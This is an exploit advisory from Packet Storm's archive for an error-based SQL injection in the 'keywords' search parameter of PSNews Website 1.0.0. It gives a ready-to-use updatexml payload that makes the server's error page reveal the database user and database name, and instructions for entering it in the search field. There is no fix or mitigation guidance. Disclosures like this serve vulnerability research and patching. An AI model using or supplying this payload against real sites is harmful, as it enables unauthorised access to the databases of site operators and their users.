PSNews Website 1.0.0 SQL Injection

2018-02-17T00:00:00
ID PACKETSTORM:146436
Type packetstorm
Reporter Borna Nematzadeh
Modified 2018-02-17T00:00:00

Description

                                        
                                            `# Exploit Title: PSNews Website (Same Backend with Mobile Apps) 1.0.0 - 'Keywords' SQL Injection  
# Dork: N/A  
# Date: 2018-02-16  
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com  
# Vendor Homepage: https://codecanyon.net/item/psnews-website/21360354?s_rank=9  
# Version: 1.0.0  
# Category: Webapps  
# CVE: N/A  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands.  
# # # # #  
# Proof of Concept :  
  
SQLI :  
  
http://server/index.php/search  
  
# Parameter : keywords (POST)  
# Type: Error based  
# Title: Mysql >= 5.6.33 AND Error based - updatexml (XPATH query)  
# Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)  
#######################################  
# Discrption : Put this payload in the search field.then you will have  
XPATH syntax error in the next page.  
  
Test : http://server/index.php/search  
Payload : ' or updatexml(1, concat(0x3a,user(),0x3a,database()),1)  
  
`